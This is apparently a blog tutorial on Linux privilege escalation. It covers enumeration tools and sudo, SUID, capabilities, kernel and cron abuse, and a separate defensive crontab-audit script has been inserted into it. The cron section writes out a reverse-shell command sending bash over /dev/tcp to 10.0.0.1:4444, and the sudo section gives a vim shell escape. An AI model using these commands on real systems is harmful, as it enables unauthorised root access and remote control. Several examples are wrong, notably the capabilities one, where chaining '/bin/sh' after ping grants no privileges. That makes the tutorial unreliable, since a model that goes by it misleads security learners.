Linux Privilege Escalation Techniques

Aditya Chauhan
Mar 27, 2023

Introduction

Linux privilege escalation refers to the process of gaining elevated privileges on a Linux system. It involves exploiting vulnerabilities, misconfigurations or weaknesses in the system to gain root access or higher-level permissions than you were initially granted. In this blog, we will explore different types of Linux privilege escalation techniques with practical examples.

Enumeration

Before we start exploring the different techniques of Linux privilege escalation, we need to understand the importance of enumeration. Enumeration is the process of gathering information about the system, services, and applications running on the system. It is an essential step in privilege escalation because it helps identify vulnerabilities and potential attack vectors.

Some of the tools used for enumeration are:

  • nmap - A powerful network scanner that can identify open ports, services and operating system information.
  • enum4linux - A tool used to enumerate Windows and Samba hosts to discover information such as user names, shares, and passwords.
  • pspy - A tool used to monitor running processes and identify file permission vulnerabilities.

Automated Tools

Automated tools are a great way to identify potential vulnerabilities and attack vectors quickly. Some popular automated tools for Linux privilege escalation are:

  • LinEnum.sh - A shell script that enumerates the system for possible privilege escalation paths.
  • linpeas.sh - A shell script similar to LinEnum, but with additional features such as SUID/SGID analysis, process and binary analysis, etc.
  • GTFOBins - A curated list of Unix binaries that can be used to bypass local security restrictions.

Kernel Exploitation

Kernel exploits involve exploiting vulnerabilities in the Linux kernel to gain elevated privileges. These types of exploits can be very dangerous as they can give an attacker complete control over the system.

Practical Example

Suppose you find that the sock_diag_handlers function in the Linux kernel has a buffer overflow vulnerability. In this case, you can create a malicious payload that exploits this vulnerability to gain root access.

gcc -o exploit exploit.c
./exploit

SUDO Exploitation

Sudo is a powerful utility in Linux that allows users to run commands with elevated privileges. If sudo is misconfigured, an attacker can use it to execute commands with elevated privileges.

Practical Example

Suppose you find that the sudo command is configured to allow a non-root user to run the vim editor with root privileges. In this case, you can open the vim editor and execute commands with elevated privileges.

sudo vim -c ':!/bin/sh'

SUID Exploitation

Setuid binaries are special programs that are executed with the permissions of their owner. If a setuid binary is owned by the root user, it can be exploited to gain root access.

Practical Example

Suppose you find a setuid binary called mybinary that is owned by the root user. In this case, you can execute mybinary and exploit it to gain root access.

./mybinary -c "/bin/sh"

Capabilities

Linux has a feature called capabilities that allows certain privileges to be assigned to a process without requiring full root privileges. This feature can be exploited to gain elevated privileges.

Practical Example

Suppose you find that the ping command has the CAP_NET_RAW capability. In this case, you can use this capability to run other commands with elevated privileges.

ping -c 1 google.com; /bin/sh

Cron Jobs

Cron is a utility that allows users to schedule commands or scripts to run automatically at specified times or intervals. If a cron job is running with elevated privileges or running a script with a vulnerability, an attacker can exploit it to gain root access.

Practical Example

Suppose you find that a cron job is running a script with a vulnerability that allows an attacker to execute commands with elevated privileges. In this case, you can modify the script to execute a reverse shell and gain root access.

echo "/bin/bash -c 'exec bash -i &>/dev/tcp/10.0.0.1/4444 <&1'" >> script.sh
chmod +x script.sh

Now, wait for the cron job to run the script and establish a reverse shell.
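
A defensive check for the cron weakness described above, as an added example that is not part of the original post: it reads a system-style crontab and reports root jobs whose script, or the directory holding it, is writable by group or others. The function names and output labels are assumptions, and it expects the /etc/crontab field layout (with a user column).

```shell
#!/bin/sh
# Added example, not from the original post. Audits a system-style crontab
# (min hour dom mon dow user command...) for root jobs that reference files
# other accounts could modify or replace.

# Print the 10-character mode string (e.g. -rwxr-xr-x), following symlinks.
mode_of() { ls -ldL -- "$1" 2>/dev/null | cut -c1-10; }

# Succeed when group or others have write permission on the path.
loosely_writable() {
    case "$(mode_of "$1")" in
        ?????w????|????????w?) return 0 ;;
    esac
    return 1
}

# Succeed when the directory has the sticky bit, which stops non-owners
# from replacing files inside it.
sticky() { case "$(mode_of "$1")" in *[tT]) return 0 ;; esac; return 1; }

# $1 = crontab file. Prints one finding per line, nothing when clean.
# The body runs in a subshell so set -f and the variables stay local.
audit_crontab() (
    set -f   # no glob expansion while the command is split into words
    while read -r min hour dom mon dow user cmdline || [ -n "$min" ]; do
        # Skip blanks, comments, VAR=value lines and @reboot-style entries
        # (the @ form has a different field layout and is not parsed here).
        case "$min" in ''|'#'*|*=*|'@'*) continue ;; esac
        [ "$user" = root ] || continue
        for tok in $cmdline; do
            # Check every absolute path so "sh /opt/job.sh" is covered too.
            case "$tok" in /*) ;; *) continue ;; esac
            [ -e "$tok" ] || continue
            if loosely_writable "$tok"; then
                echo "WRITABLE_FILE $tok"
            fi
            dir=$(dirname "$tok")
            if loosely_writable "$dir" && ! sticky "$dir"; then
                echo "WRITABLE_DIR $dir"
            fi
        done
    done < "$1"
    return 0
)

# When a crontab path is given on the command line, audit it.
if [ "$#" -gt 0 ]; then audit_crontab "$1"; fi
```

Any finding means a non-root account may be able to change what root executes; the usual fix is root ownership with mode 755 or stricter on both the script and its directory.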

Conclusion

In conclusion, Linux privilege escalation is a critical aspect of penetration testing and security auditing. It is essential to identify and exploit vulnerabilities in the system to assess its security posture. Enumeration, automated tools, kernel exploitation, SUDO exploitation, SUID exploitation, capabilities, and cron jobs are some of the techniques used for privilege escalation. It is important to note that these techniques should only be used for ethical purposes with the system owner’s consent.
